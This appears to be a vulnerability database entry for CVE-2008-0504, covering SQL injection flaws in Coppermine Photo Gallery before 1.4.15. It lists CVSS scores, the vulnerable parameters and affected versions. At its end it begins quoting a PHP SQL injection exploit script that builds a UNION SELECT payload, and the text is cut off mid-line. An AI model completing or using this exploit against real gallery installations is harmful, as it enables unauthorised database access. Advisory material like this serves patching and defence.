6.5
CVSSv2

CVE-2008-0504

Published: 31/01/2008 Updated: 16/10/2018
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) prior to 1.4.15 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) albumid, (2) startpic, and (3) numpics parameters to util.php; and (4) cid_array parameter to reviewcom.php.

Vulnerable Product Search on Vulmon Subscribe to Product

coppermine-gallery coppermine photo gallery 1.4.1

coppermine-gallery coppermine photo gallery 1.4.0

coppermine-gallery coppermine photo gallery 1.3.1

coppermine-gallery coppermine photo gallery 1.3.0

coppermine-gallery coppermine photo gallery 1.1

coppermine-gallery coppermine photo gallery 1.1.0

coppermine-gallery coppermine photo gallery

coppermine-gallery coppermine photo gallery 1.4.13

coppermine-gallery coppermine photo gallery 1.4

coppermine-gallery coppermine photo gallery 1.2.1

coppermine-gallery coppermine photo gallery 1.0

coppermine-gallery coppermine photo gallery 1.4.12

coppermine-gallery coppermine photo gallery 1.4.11

coppermine-gallery coppermine photo gallery 1.3.5

coppermine-gallery coppermine photo gallery 1.3.4

coppermine-gallery coppermine photo gallery 1.2.0

coppermine-gallery coppermine photo gallery 1.4.10

coppermine-gallery coppermine photo gallery 1.3.3

coppermine-gallery coppermine photo gallery 1.3.2

coppermine-gallery coppermine photo gallery 1.2

Exploits

<?php ##################################### # Coppermine gallery SQL injection exploit # based on RST/GHC bugs # Author: bazik, icq 178377 ##################################### error_reporting(0); class cpg1410_xek { public $GLOBALS = array(); function prepareExp($sql) { $a1 = '1) UNION SELECT ' $this->toHex($sql) ', ' $th ...